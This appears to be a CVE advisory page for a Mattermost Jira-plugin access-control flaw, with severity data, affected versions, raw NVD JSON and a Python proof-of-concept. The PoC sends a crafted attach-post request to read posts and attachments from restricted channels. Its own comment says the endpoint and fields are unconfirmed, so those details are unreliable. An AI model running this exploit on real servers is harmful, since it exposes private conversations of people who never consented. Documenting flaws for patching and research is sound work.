Security Vulnerability Report
CVE-2025-13767 CVSS 4.3 MEDIUM

CVE-2025-13767

Published: 2025-12-24 08:15:46
Last Modified: 2025-12-31 18:56:28

Description

Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3, 10.11.x <= 10.11.7 fails to validate user channel membership when attaching Mattermost posts as comments to Jira issues, which allows an authenticated attacker with access to the Jira plugin to read post content and attachments from channels they do not have access to.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (Mattermost 11.1.x <= 11.1.0) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (Mattermost 11.0.x <= 11.0.5) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (Mattermost 10.12.x <= 10.12.3) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (Mattermost 10.11.x <= 10.11.7) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13767 PoC - Mattermost Jira Plugin Unauthorized Access
# This PoC demonstrates the access control bypass in the Mattermost Jira plugin.
# Note: the endpoint path, request fields and response fields below are those
# given by this PoC's author; they are not confirmed by the vendor advisory
# referenced on this page.
import requests

TARGET_URL = "https://your-mattermost-instance.com"
ATTACKER_TOKEN = "your-authentication-token"
CHANNEL_ID = "target-channel-id"  # Channel the attacker doesn't have access to
POST_ID = "target-post-id"        # Post ID from the restricted channel


def exploit_unauthorized_access():
    """
    Exploit the missing channel membership validation in the Jira plugin.
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json",
    }

    # Step 1: Attempt to attach the post to a Jira issue without channel membership
    exploit_data = {
        "post_id": POST_ID,
        "channel_id": CHANNEL_ID,
        "jira_issue_key": "PROJECT-123",
    }

    response = requests.post(
        f"{TARGET_URL}/api/v4/plugins/com.mattermost.jira/api/v2/attach-post",
        headers=headers,
        json=exploit_data,
    )

    # If successful, the post content and attachments are exposed
    if response.status_code == 200:
        data = response.json()
        print(f"[+] Successfully accessed post: {data.get('post_id')}")
        print(f"[+] Post content: {data.get('message')}")
        print(f"[+] Attachments: {data.get('attachments')}")
    else:
        print(f"[-] Exploit failed: {response.status_code}")


if __name__ == "__main__":
    exploit_unauthorized_access()
```

References

https://mattermost.com/security-updates (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-13767", "sourceIdentifier": "[email protected]", "published": "2025-12-24T08:15:45.553", "lastModified": "2025-12-31T18:56:27.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3, 10.11.x <= 10.11.7 fails to validate user channel membership when attaching Mattermost posts as comments to Jira issues, which allows an authenticated attacker with access to the Jira plugin to read post content and attachments from channels they do not have access to."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.8", "matchCriteriaId": "7B0477E2-8999-4E1D-9E6B-7A818CB76488"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.4", "matchCriteriaId": "B83EB4C3-5E75-4BD1-94F3-ED29D329E5C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.6", "matchCriteriaId": "B6EAC2A0-B481-45EA-90AE-F950921DB06A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.0", "versionEndExcluding": "11.1.1", "matchCriteriaId": "387573EC-2596-4529-BD43-054E52D34EC0"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```